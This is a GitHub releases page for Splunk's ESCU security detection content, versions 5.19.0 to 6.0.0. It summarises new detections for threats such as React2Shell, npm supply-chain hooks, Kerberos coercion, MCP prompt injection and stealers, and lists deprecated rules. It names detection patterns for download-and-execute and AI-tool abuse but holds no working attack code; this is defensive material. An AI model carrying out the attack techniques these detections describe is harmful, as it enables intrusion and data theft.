Skip to content

Releases: splunk/security_content

v6.0.0

01 Jun 19:37
@patel-bhavin patel-bhavin
v6.0.0
4493a82
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v6.0.0 Latest
Latest

🚀 Key Highlights

ESCU 6.0.0 is a major release that includes a number of changes for better alignment with Enterprise Security v8.x+ features.

Please note that all content has been updated in this release, resulting in cleaner, more readable .conf files.

🔍Expanded Finding and Intermediate Finding Support 🔎

Detections that previously created Notable Events, and then Findings with a 0 score “N/A” entity will now create a Finding with an appropriately tagged entity from the search results, with the score that previously would have been used for a risk event/Intermediate Finding for that entity.

Because of the shift to tagging entities to Findings, fewer total Intermediate Findings may be created for some detections, as we won’t be separately creating Intermediate Findings for every entity.

🗓️ Increased Clarity on Content Creation Date vs Modification Date 🗓️

Detections, Analytic Stories, and other things, depending on where you view them now have both creation and modification dates indicating when we first created them and when we’ve last modified them.

🛠️ Repository Tooling Updates 🛠️

ESCU v6.0 marks the transition away from contentctl. We are shifting future investment from contentctl to Detection Studio as we work to bring this functionality into Splunk as an officially supported capability. The contentctl repository will remain publicly available for reference, forking, and customization, but continued use may require customer-managed customization. For more information, see https://github.com/splunk/contentctl/blob/main/README.md

Future Breaking Changes

As previously communicated in ESCU v5.27.0, a number of detections will be removed in v6.1.0. For details on detections scheduled for removal in ESCU version v6.1.0, see the List of Detections Scheduled for Removal.

List of detections scheduled for removal in ESCU version 6.1.0

Deprecated Detection Replacement Detection
CHCP Command Execution Not Available
Sc exe Manipulating Windows Services Not Available
Processes launching netsh Not Available
Ivanti Sentry Authentication Bypass Not Available
Attempt To Add Certificate To Untrusted Store Not Available

List of detections deprecated in ESCU version 6.0.0

Deprecated Detection Replacement Detection
Assets 3
Loading

v5.27.0

06 May 17:39
@patel-bhavin patel-bhavin
v5.27.0
9c183fa
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.27.0

🚀 Key Highlights

  • 🚨 Linux Copy Fail Privilege Escalation (CVE-2026-31431): Added a new detection: Linux Auditd Copy Fail Privilege Escalation to identify exploitation of the Copy Fail vulnerability, a Linux kernel flaw that enables unprivileged users to perform controlled writes to file page cache and escalate privileges to root. This analytic leverages auditd telemetry to detect suspicious modification patterns targeting setuid binaries, providing early visibility into local privilege escalation attempts across affected Linux systems.

  • 🔐 Cisco Secure Access Analytics: Introduced a new analytic story for Cisco Secure Access, leveraging firewall telemetry to detect suspicious access patterns. This release includes updates to existing detections: Large ICMP Traffic, Outbound SMB Traffic, Outbound LDAP Traffic, and Windows RDP Network Brute Force Attempts enabling them to operate with Cisco Secure Access Firewall data, validated through simulated attack scenarios to improve visibility into adversary activity traversing modern cloud-delivered security controls.

  • 🪟 Windows Threat Detection Expansion: Significantly expanded coverage across multiple analytic stories with the addition of a broad set of new detections targeting modern Windows attack techniques, including PowerShell abuse, process injection, privilege escalation, registry manipulation, cloud and Azure activity, RMM tool usage, and C2 frameworks such as Cobalt Strike, Metasploit, and custom agents. These analytics enhance visibility into attacker behaviors like defense evasion (EDR bypass, obfuscation, EFI tampering), persistence (scheduled tasks, file association changes, GPO abuse), credential access (LAPS harvesting, keychain-like data access), and lateral movement and exfiltration, while also covering emerging tradecraft such as Cloudflared tunnels, Devtunnels, and supply chain tooling abuse—providing deeper detection across the Windows attack lifecycle.

  • ⌨️ VIP Keylogger (.NET Stealer) Detection Coverage: Introduced new analytics to strengthen detection of VIP Keylogger and related .NET-based infostealers by focusing on behavioral indicators of stealthy execution and persistence. New detections: PowerShell Environment Variable Execution, Windows Anomalous Registry Value Length in Environment Key, PowerShell PInvoke Process Injection API Chain, and Windows Proxy Execution of .NET Utilities via Scripts surface patterns such as encoded payload staging in registry keys, script-driven execution of trusted .NET binaries, and in-memory process injection techniques, improving visibility into credential theft operations, obfuscated execution chains, and defense evasion commonly used in modern phishing-delivered stealer campaigns.

New Analytic Story - [2]

New Analytics - [67]

Read more
Loading

v5.26.0

22 Apr 20:58
@patel-bhavin patel-bhavin
v5.26.0
8c50bca
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.26.0

🚀 Key Highlights

  • 🍎 macOS Detection Coverage Expansion: Expanded detection coverage for macOS environments with three new analytic stories - macOS Persistence Techniques, macOS Post-Exploitation, and macOS Privilege Escalation - delivering visibility across the full attack lifecycle. This release introduces detections for behaviors such as account creation, Gatekeeper bypass, keychain dumping, LoginHook persistence, kextload abuse, hidden files/directories, log removal, data chunking, network share discovery, and firewall rule enumeration, strengthening defense against stealthy macOS threats and improving monitoring of attacker activity on Apple endpoints.
  • ⛓️ Axios Supply Chain Post-Compromise Activity: Expanded detection coverage for Axios-related supply chain post-compromise scenarios by tagging existing analytics that capture behaviors associated with malicious package execution and downstream abuse. This update improves visibility into post-installation script execution, credential access, data exfiltration, and persistence mechanisms often triggered after a compromised dependency is introduced, helping defenders detect and respond to supply chain attacks impacting JavaScript and Node.js ecosystems.

New Analytic Story - [4]

New Analytics - [11]

Other Updates

  • Fixed a bug in the Onboarding Assistant that affected Splunk Cloud customers using instances configured on ports (other than 8000). In these cases, detections within an analytic story failed to enable correctly or behaved inconsistently. This issue has been resolved, and detections can now be enabled successfully.
  • Updated all View risk events for the last 7 days drilldown searches to reflect the correct earliest and latest time configuration.
  • Improved detection coverage and accuracy across multiple rules by fixing regex issues, refining conditions, adding macro usage, and reducing false positives. To view the detailed list of updates and the associated Github issues, please view the details in this pull request.
  • Removed missing fields from the Windows Event Log Cleared detection (External Contributor: AndreiBanaru).

Breaking Changes

As previously communicated in the ESCU v5.24.0 release, several detections have been removed. For a complete list of the detections removed in version v5.26.0, refer to the List of Removed Detections. Users are expected to transition to the recommended replacements where applicable. Additionally, a new set of detections has been deprecated. For details on detections scheduled for removal in ESCU version v6.1.0, see the List of Detections Scheduled for Removal.

Loading

v5.25.1

15 Apr 21:06
@pyth0n1c pyth0n1c
v5.25.1
6a8bfe9

Choose a tag to compare

View all tags
v5.25.1

🩹 Patch Notes

ESCU 5.25.1 is a patch release that mediates a bug introduced in ESCU 5.25.0, which has been pulled from GitHub and Splunkbase.

In ESCU v5.25.0, the Detection Windows Security Support Provider Reg Query had its "version" bumped despite the detection being unchanged. This could lead to errors and failures during the Enterprise Security Content Versioning process.

Please note that this is a separate, and unrelated, issue to the Following Known Detection Versioning Issue SECHELP-341 in Enterprise Security 8.3, 8.4, and 8.5

Since the ESCU 5.25.0 Release has been pulled from Splunkbase and GitHub, the ESCU 5.25.0 Release Notes have been reproduced below.

🚀 ESCU 5.25.0 Key Highlights

  • Ghost RAT: Expanded coverage for Ghost RAT activity by tagging multiple existing analytics related to service creation, registry persistence, command-line execution, and system discovery behaviors, alongside new detections for Windows Remote Access Registry Entry and Windows Rundll32 with Non-Standard File Extension. Additionally, improved detection fidelity with updates to Ping Sleep Batch Command and introduced a new analytic story Ghost RAT, enhancing visibility into stealthy persistence, defense evasion, and command execution techniques commonly used by this malware family.
  • Void Manticore Activity Coverage Expansion: Expanded detection coverage for Void Manticore, a threat group associated with destructive and espionage-driven operations, by tagging multiple existing analytics aligned to data destruction, shadow copy deletion, backup recovery tampering, and suspicious script execution behaviors. This update enhances visibility into attacker tradecraft involving bcdedit manipulation, recursive file deletion, remote process execution via WMI, and suspicious process/file activity, improving detection of pre-impact and impact-stage techniques commonly used in disruptive campaigns targeting enterprise environments.
  • Detection & Content Improvements: Introduced new data source support, migrated Palo Alto integrations, enhanced detections with MITRE mappings, fixed regex and logic issues, reduced false positives, improved accuracy and performance, updated metadata based on telemetry insights, and refactored multiple analytics and SPL queries for better readability, consistency, and reliability

New Analytic Story - [2]

New Analytics - [2]

Updated Analytics

Based on various other telemetry sources, we have updated a list of detections missing Mitre IDs, updated data sources and detections with the following changes:

Loading

v5.24.0

18 Mar 21:20
@patel-bhavin patel-bhavin
v5.24.0
45134af
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.24.0

🚀 Key Highlights

  • Cisco SD-WAN Analytics: Expanded coverage for Cisco SD-WAN environments with new analytics targeting exploitation and anomalous traffic patterns, including detections for Cisco SD-WAN Arbitrary File Overwrite Exploitation Activity and Cisco SD-WAN Uncommon User-Agent Multi-URI Activity, improving visibility into potential exploitation attempts and suspicious HTTP behaviors indicative of adversary interaction with SD-WAN infrastructure.
  • BlankGrabber Stealer and Muddy Water Analytics: Expanded detection coverage for BlankGrabber, a Windows-based information stealer used to harvest browser credentials, cryptocurrency wallets, and authentication tokens, by tagging existing analytics and introducing new detections focused on browser data access, suspicious registry queries, WMI reconnaissance, and defense evasion behaviors such as PowerShell exclusion tampering. This update enhances visibility into credential harvesting, data staging, and stealthy exfiltration activity commonly associated with phishing-delivered stealers and cracked software infections, helping defenders detect and respond to early-stage compromise before widespread account takeover or financial theft occurs.
  • Lotus Blossom (Chrysalis Backdoor) Supply Chain Attack: Added new detection coverage for the Lotus Blossom (Billbug) APT group's Chrysalis backdoor campaign, which leveraged a Notepad++ supply chain compromise (June–December 2025) to target government, financial, and IT sectors. This release introduces detections for Bitdefender DLL sideloading abuse, BluetoothService-based persistence, and TinyCC shellcode execution, along with tagging existing analytics for system and user discovery behaviors observed across multiple infection chains. These updates improve visibility into stealthy execution, persistence mechanisms, and post-compromise reconnaissance associated with sophisticated supply chain intrusions and staged payload delivery.
  • Standardized Risk Scoring Across Detections: Implemented consistent risk scoring across all analytics by assigning a score of 50 for TTP detections and 20 for anomaly-based detections, improving prioritization, correlation, and alert triage across detection workflows.

New Analytic Story - [4]

Updated Analytic Story - [1]

New Analytics - [14]

Updated Analytics - [1655]

Read more
Loading

v5.23.0

04 Mar 19:11
@patel-bhavin patel-bhavin
v5.23.0
261b5fe
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.23.0

🚀 Key Highlights

  • 🤖 Cisco Catalyst SD-WAN Analytics:

Introduced a new analytic story for Cisco Catalyst SD-WAN focused on identifying anomalous control-plane relationships across vManage, vSmart, and edge devices. By leveraging telemetry related to control-connection state changes, peer identity, public IP associations, and system roles, this release detects rare or unexpected peer interactions that may signal misconfigurations, unauthorized infrastructure, or adversary presence within SD-WAN environments. New detections — Cisco SD-WAN Low Frequency Rogue Peer and Cisco SD-WAN Peering Activity — provide visibility into suspicious control-plane communications and abnormal peering patterns that deviate from established network baselines.

New Analytic Story - [1]

New Analytics - [3]

Other Updates

  • Added end-to-end YAML formatting/validation (yamlfmt + yamllint) via a new pre-commit hook and CI “YAML Validation” job (validate_yaml.py), updates docs, and auto-formats all detections/analytics (including initial SPL beautification using |- for readability).
  • Updates multiple detections to better cover calc-related binaries by adding CalculatorApp.exe/win32calc.exe entries, fixing a LOLBAS network-traffic filter bug (All_Traffic.dest_ip), and enhancing calc DLL side-loading rule metadata (including explicit WindowsCodecs.dll) to address issue #3916.
Loading

v5.22.0

19 Feb 18:58
@patel-bhavin patel-bhavin
v5.22.0
c2044d9
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.22.0

🚀 Key Highlights

  • 🤖 Suspicious MCP Activities:
    Introduced a new analytic story focused on detecting abuse of authorized Model Context Protocol (MCP) server deployments, where legitimate AI tool integrations (filesystem, database, API, and cloud operations) may be weaponized for data exfiltration, privilege escalation, lateral movement, or persistence. This release includes a new MCP Technology Add-on (TA) for parsing MCP server telemetry and adds detections such as MCP Sensitive System File Search, MCP Prompt Injection, MCP Postgres Suspicious Query, MCP GitHub Suspicious Operation, and MCP Filesystem Server Suspicious Extension Write, providing visibility into malicious tool invocation patterns, abnormal data access, and AI-driven attack chains leveraging trusted automation infrastructure.

  • 💥 DynoWiper and ZOVWiper (Sandworm Destructive Operations):
    Expanded coverage for the destructive malware families DynoWiper and ZOVWiper, attributed to the Russia-aligned threat group Sandworm, by tagging existing endpoint analytics aligned to their file-overwrite, drive enumeration, and system reboot behaviors. These wipers target critical infrastructure and financial sectors, systematically overwriting data across fixed and removable drives while selectively skipping system directories to maximize operational impact. By mapping current detections to known Sandworm tradecraft, this update strengthens visibility into destructive file modification patterns, large-scale overwrite activity, and pre-reboot execution behaviors associated with modern wiper deployments.

  • ☀️ SolarWinds Web Help Desk RCE (CVE-2025-26399) Post-Exploitation:
    Tagged existing analytics to enhance visibility into post-exploitation activity following SolarWinds WHD remote code execution, focusing on suspicious process spawning, privilege escalation, lateral movement, persistence mechanisms, and outbound command-and-control behavior originating from compromised Web Help Desk services.

New Analytic Story - [5]

New Analytics - [7]

Updated Analytics

Breaking Changes

As previously communicated in the ESCU v5.20.0 release, several detections have been removed. For a complete list of the detections removed in version v5.22.0, refer to the List of Removed Detections. Users are expected to transition to the recommended replacements where applicable. Additionally, a new set of detections has been deprecated. For details on detections scheduled for removal in ESCU version v5.24.0, see the List of Detections Scheduled for Removal.

Removed Detection Replacement Detection
Cobalt Strike Named Pipes Windows Suspicious C2 Named Pipe
HTTP Suspicious Tool User Agent HTTP Scripting Tool User Agent

Contributors

bpluta-splunk
Loading

v5.21.0

05 Feb 22:37
@patel-bhavin patel-bhavin
v5.21.0
73b2b82
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.21.0

🚀 Key Highlights

  • 🔍 New Finding-Based Detections (ES 8.4+):
    Starting with Splunk Enterprise Security 8.4 and above, ESCU introduces Finding-Based Detections, a new analytic type that automatically groups and correlates high volumes of related findings and intermediate at the entity level. This reduces alert noise and helps analysts quickly focus on users or hosts most likely to represent real threats.

  • 🛡️ GNU Telnetd CVE-2026-24061 Authentication Bypass:
    Introduced a new analytic story covering CVE-2026-24061, a critical authentication bypass vulnerability in GNU InetUtils telnetd that allows unauthenticated attackers to establish a Telnet session as root. This flaw abuses an unsanitized, attacker-controlled USER environment variable passed to the login process, enabling direct privilege escalation without valid credentials. Added a new detection — Linux Telnet Authentication Bypass — to identify exploitation attempts targeting legacy Unix/Linux systems, embedded devices, network appliances, and operational technology environments where Telnet remains in use.

  • 🌐 Windows Chromium Browser Hijacking Enhancements:
    Expanded browser hijacking coverage with new endpoint detections targeting suspicious Chromium-based browser execution patterns on Windows. Added analytics to identify browsers launched with abnormally small window sizes, disabled popup blocking, disabled logging, suppressed extensions, and headless execution — behaviors commonly associated with ad fraud, credential harvesting, session hijacking, and stealthy user interaction abuse. These detections improve visibility into malicious browser manipulation used by infostealers, loaders, and post-exploitation frameworks.

  • 🎯 Expanded Threat Actor and Malware Coverage (VoidLink, Storm-0501, StealC):
    Tagged a broad set of existing analytics and improved detection coverage for several high-impact threats. Added comprehensive coverage for VoidLink, a cloud-native Linux malware framework leveraging a modular C2 architecture, rootkit functionality, and advanced evasion techniques to target containerized and cloud environments. Additionally, enhanced analytic stories and tagging for Storm-0501 ransomware activity and the StealC stealer, improving visibility into ransomware execution chains, credential theft, downloader behavior, and post-compromise persistence across Windows and Linux environments.

Total New and Updated Content: [419]

New Analytic Story - [4]

Updated Analytic Story - [6]

Updated Analytics -[6]

Breaking Changes

Other Updates

  • Updated several analytics and significantly improved performance and efficiency across multiple detections by optimizing search logic (e.g., subsearches, targeted where clauses, and reduced search space), resulting in substantial runtime reductions and clearer user guidance where applicable. Pull request for specific details (#1 and #2)
  • Updated analytics to have standardized known false positive sections and filter macros at the end of all searches
  • We received reports from a number of customers whereby Removed Searches may still be scheduled to run and their execution would fail silently. However, these searches could not be disabled because they failed to render in the Saved Searches UI. This release includes a fix to savedsearches.conf which ensures that Removed Content still appears in the SavedSearches UI if it had previously been scheduled or modified, allowing these searches to be disabled.
Loading

v5.20.0

20 Jan 21:07
@patel-bhavin patel-bhavin
v5.20.0
2008331
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.20.0

🚀 Key Highlights

  • 🌐 Browser Hijacking:
    Introduced a new set of detections focused on browser hijacking techniques that manipulate Chrome configurations, registry settings, and command-line behaviors to persist malicious control, disable updates, and load unauthorized extensions. These detections surface suspicious actions such as disabling Chrome auto-updates, allowlisting or force-loading extensions, and abusing command-line flags to bypass browser security controls. Together, they help security teams identify early indicators of browser compromise, policy tampering, and user-impacting persistence mechanisms commonly leveraged by modern malware.

  • ☸️ Cisco Isovalent Suspicious Activity:
    Expanded detection coverage leveraging Cisco Isovalent's kernel-level eBPF telemetry to identify advanced threats targeting Kubernetes and cloud-native environments. New detections focus on high-risk behaviors such as access to cloud metadata services, suspicious process execution, container escape techniques, offensive tooling in pods, anomalous kprobe activity, and unexpected shell or network behavior. By correlating low-level runtime signals with rich Kubernetes context, this content enables early detection of in-cluster attacks, lateral movement, and workload compromise before adversaries can escalate or persist.

  • 🕵️ Suspicious User Agents:
    Introduced enhanced detection coverage to identify suspicious and default user agent strings commonly used by malware, command-and-control frameworks, remote monitoring and management (RMM) tools, and other potentially unwanted applications. These detections focus on uncovering overlooked or hard-coded user agents frequently left unchanged by adversaries, providing network-level visibility into malicious tooling that blends into normal HTTP traffic. By correlating anomalous user agents across malware, C2 frameworks, PUAs, and RMM software, security teams can more quickly identify and investigate stealthy network activity.

  • 🤖 SesameOp & PromptFlux:
    Expanded analytic coverage for emerging malware families that abuse legitimate AI service APIs as command-and-control channels, allowing adversaries to hide malicious activity within trusted cloud traffic. This update tags relevant existing detections and introduces a new detection for Windows Potential AppDomainManager Hijack Artifacts Creation, addressing key persistence and injection techniques leveraged by SesameOp and PromptFlux. Together, these detections help surface anomalous API usage, suspicious persistence artifacts, and post-exploitation behaviors that indicate covert C2 activity masquerading as normal AI service interactions.

  • 🔐 Cisco IOS & Secure Firewall Privileged Activity:
    Added new detections and risk-based correlation searches to identify high-risk administrative activity targeting Cisco IOS and Cisco Secure Firewall devices. The new detections focus on privileged command execution over HTTP and anomalous SSH behavior, including connections to non-standard ports and suspicious SSH services. These signals are correlated using the Risk data model to surface higher-fidelity alerts for privileged account creation combined with suspicious HTTP or SSH activity, helping teams identify post-exploitation and persistence attempts on network edge infrastructure.

New Analytic Story - [5]

New Analytics - [25]

Other Updates

  • Performance & Coverage Improvements – Updated several searches by replacing regex-based matching with direct match driven comparisons to significantly improve performance and scalability in large environments, while also refreshing multiple lookup files to ensure accurate and up-to-date detection logic

Breaking Changes

As previously communicated in ESCU v5.18.0, several detections have been removed in v5.20.0:

Removed Detection Replacement Detection
Windows Default RDP File Creation Windows Default RDP File Creation By Non MSTSC Process
Windows Java Spawning Shells Web or Application Server Spawning a Shell
Linux Java Spawning Shell Web or Application Server Spawning a Shell
W3WP Spawning Shell Web or Application Server Spawning a Shell
Wget Download and Bash Execution File Download or Read to Pipe Execution
Curl Download and Bash Execution File Download or Read to Pipe Execution
Wmiprsve LOLBAS Execution Process Spawn Wmiprvse LOLBAS Execution Process Spawn
Loading

v5.19.0

10 Dec 19:41
@patel-bhavin patel-bhavin
v5.19.0
61d302d
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
v5.19.0

🚀 Key Highlights

  • 🐚 React2Shell (CVE-2025-55182):
    Introduced a new analytic story, React2Shell, addressing the critical pre-authentication Remote Code Execution (RCE) vulnerability in React Server Components. This vulnerability affects React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, as well as Next.js 15.x and 16.x versions using the App Router. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, allowing attackers to execute arbitrary JavaScript code on the server without authentication.
    New detections provide coverage for both Windows and Linux environments, focusing on suspicious child processes spawned by Node.js, React, or Next.js server processes, including execution of shells, scripting interpreters, and system utilities commonly abused post-exploitation. Additionally, a network-based detection leverages Cisco Secure Firewall Threat Defense Intrusion Events, which identifies React Server Components remote code execution attempts at the network layer, providing early visibility into exploitation attempts.

  • 👾 Tuoni C2 Framework:
    Introduced a new analytic story addressing threats from the Tuoni command-and-control framework, a sophisticated cross-platform red teaming tool increasingly adopted by threat actors for real-world attacks. Tuoni enables adversaries to deploy malicious payloads directly into system memory, bypassing traditional disk-based detection mechanisms. Its modular design supports multiple attack variations and allows operators to maintain persistence and execute commands across Windows, Linux, and macOS environments without leaving significant forensic artifacts. New detections focus on identifying Tuoni's memory-based execution patterns, suspicious process behaviors, and command-and-control communication indicators commonly associated with this framework, providing security teams with visibility into attacks that leverage this emerging threat tool.

  • 🔐 Kerberos Coercion with DNS (CVE-2025-33073):
    Introduced comprehensive detection coverage for the recently disclosed CVE-2025-33073 vulnerability, where attackers leverage DNS records to trigger Kerberos authentication from remote hosts—a technique that can lead to credential relay or domain privilege escalation. New detections including Windows Short-Lived DNS Record, Windows Kerberos Coercion via DNS, Windows Credential Target Information Structure in Command Line, and DNS Kerberos Coercion provide end-to-end visibility into DNS-based coercion behaviors across authentication and name resolution events, enabling SOCs to identify identity coercion attacks that often unfold silently inside Active Directory environments.

  • 📦 NPM Supply Chain Compromise (Shai-Hulud Campaigns):
    Expanded detection coverage for npm ecosystem supply chain compromises, addressing both the Shai-Hulud 2.0 worm campaign and recurring lifecycle hook abuse patterns. Added analytics to detect malicious npm package installations that execute arbitrary scripts through preinstall, install, postinstall, or prepare hooks—a long-standing risk vector exploited in major incidents from event-stream (2018) to ua-parser-js (2021) and Shai-Hulud (2025). New detections monitor GitHub workflow tampering, credential theft, and cross-platform exfiltration behaviors that often unfold silently inside CI/CD pipelines, giving defenders early visibility into malicious package lifecycle hooks and enhancing the ability to detect supply chain compromise before widespread impact.

  • 🖥️ NetSupport RMM Tool Abuse:
    Strengthened detection coverage for malicious use of the NetSupport Manager RMM tool, which adversaries frequently deploy for covert remote access under the guise of legitimate remote-support activity. New analytics identify NetSupport's presence through loaded module patterns, executable masquerading, and registry manipulation, helping distinguish authorized IT administration from unauthorized NetSupport-based intrusions involving renamed binaries, PowerShell-assisted deployment, suspicious startup locations, and stealthy remote control sessions. These detections complement updated credential-theft coverage to surface cases where NetSupport is deployed as part of a broader credential access or persistence chain.

  • 🤖 Suspicious Local LLM Frameworks (Shadow AI):
    Added new analytics to address the rise of Shadow AI—unauthorized deployment of local Large Language Model (LLM) frameworks such as Ollama, LM Studio, GPT4All, Jan, llama.cpp, and KoboldCPP inside enterprise environments. These tools allow users to run powerful models locally, creating blind spots for data exfiltration, policy violations, and unmonitored processing of sensitive information. New detections monitor model file downloads (.gguf, .ggml, safetensors), suspicious process execution, and DNS lookups to model repositories, providing defenders with early warning before unmonitored AI runtimes become channels for data exposure or endpoint abuse.

  • 🔥 Suspicious Cisco ASA Activity:
    Expanded detection coverage for malicious or unauthorized activity on Cisco Adaptive Security Appliances (ASA), representing the most extensive set of Cisco ASA security analytics released to date. New detections focus on configuration tampering, credential misuse, and covert administrative behaviors often seen in targeted network compromise and firewall takeover scenarios. Analytics surface high-risk events including AAA policy modification, logging filter tampering, logging message suppression, packet capture activation, and device file copy operations—both locally and to remote destinations. Additional detections highlight identity-based abuse such as new local user account creation, user deletion, privilege level changes, and lockout threshold anomalies, along with reconnaissance command usage that may reveal adversary staging or pre-attack mapping. By bringing ASA telemetry into the same analytic ecosystem as NVM, FTD, Duo, Umbrella, and Talos-driven rapid responses, this update enhances visibility into attempts to weaken audit controls, establish persistence, exfiltrate configuration data, or manipulate security boundaries on Cisco ASA devices.

New Analytic Story - [6]

New Analytics - [31]

Read more
Loading